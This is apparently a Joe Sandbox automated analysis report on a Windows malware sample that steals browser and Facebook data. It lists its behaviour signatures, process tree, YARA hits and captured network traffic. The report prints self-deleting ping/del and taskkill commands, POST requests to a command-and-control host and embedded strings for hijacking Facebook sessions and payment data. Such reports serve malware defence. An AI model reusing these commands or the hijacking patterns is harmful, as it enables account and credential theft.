Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report fnhcdXEfus.exe

Overview

General Information

Sample Name:fnhcdXEfus.exe
Analysis ID:346325
MD5:18169f98e39ae228d131aec477c8a2e9
SHA1:c6c6eacaa8df6ea5251c7f26a2d9ec4317092e6a
SHA256:344b323928698d9982c7577e5405a1cb587c45f94a0f6745827648381397f255
Tags:Mingloa

Most interesting Screenshot:

Detection

Score:90
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Startup

  • System is w10x64
  • fnhcdXEfus.exe (PID: 5976 cmdline: 'C:\Users\user\Desktop\fnhcdXEfus.exe' MD5: 18169F98E39AE228D131AEC477C8A2E9)
    • msiexec.exe (PID: 4084 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 63C4F3D9EA0CC861.exe (PID: 3664 cmdline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2 MD5: 18169F98E39AE228D131AEC477C8A2E9)
      • 1612045890161.exe (PID: 5440 cmdline: 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 3148 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 412 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6268 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 63C4F3D9EA0CC861.exe (PID: 6004 cmdline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2 MD5: 18169F98E39AE228D131AEC477C8A2E9)
      • cmd.exe (PID: 1240 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 6164 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6328 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6372 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 5776 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 5748 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 3492 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.2.fnhcdXEfus.exe.2810000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
3.2.63C4F3D9EA0CC861.exe.26f0000.2.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.63C4F3D9EA0CC861.exe.26d0000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.63C4F3D9EA0CC861.exe.10000000.7.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
3.2.63C4F3D9EA0CC861.exe.10000000.7.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeMetadefender: Detection: 29%Perma Link
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted fileShow sources
Source: fnhcdXEfus.exeVirustotal: Detection: 73%Perma Link
Source: fnhcdXEfus.exeMetadefender: Detection: 29%Perma Link
Source: fnhcdXEfus.exeReversingLabs: Detection: 82%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: fnhcdXEfus.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Compliance:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeUnpacked PE file: 0.2.fnhcdXEfus.exe.2810000.5.unpack
Uses 32bit PE filesShow sources
Source: fnhcdXEfus.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR DllsShow sources
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: fnhcdXEfus.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.3.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1612045890161.exe, 0000000B.00000000.258604279.000000000040F000.00000002.00020000.sdmp, 1612045890161.exe.3.dr
Source: Binary string: atl71.pdbT source: atl71.dll.3.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.3.dr
Source: Binary string: atl71.pdb source: atl71.dll.3.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.3.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.3.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.3.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.3.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.3.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.3.dr
Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\setup.pdb source: fnhcdXEfus.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001E.00000002.347950817.00000000002BC000.00000002.00020000.sdmp, ThunderFW.exe.3.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.3.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.3.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI6DDB.tmp.1.dr
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0042A5EF __EH_prolog3_GS,_memset,GetTempPathW,FindFirstFileW,CompareFileTime,DeleteFileW,FindNextFileW,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\

Networking:

barindex
Uses ping.exe to check the status of other devices and networksShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: C8DD8AE6DC4DC644.xyzAccept: */*
Source: global trafficHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 84Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1405Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: C8DD8AE6DC4DC644.xyzAccept: */*
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: 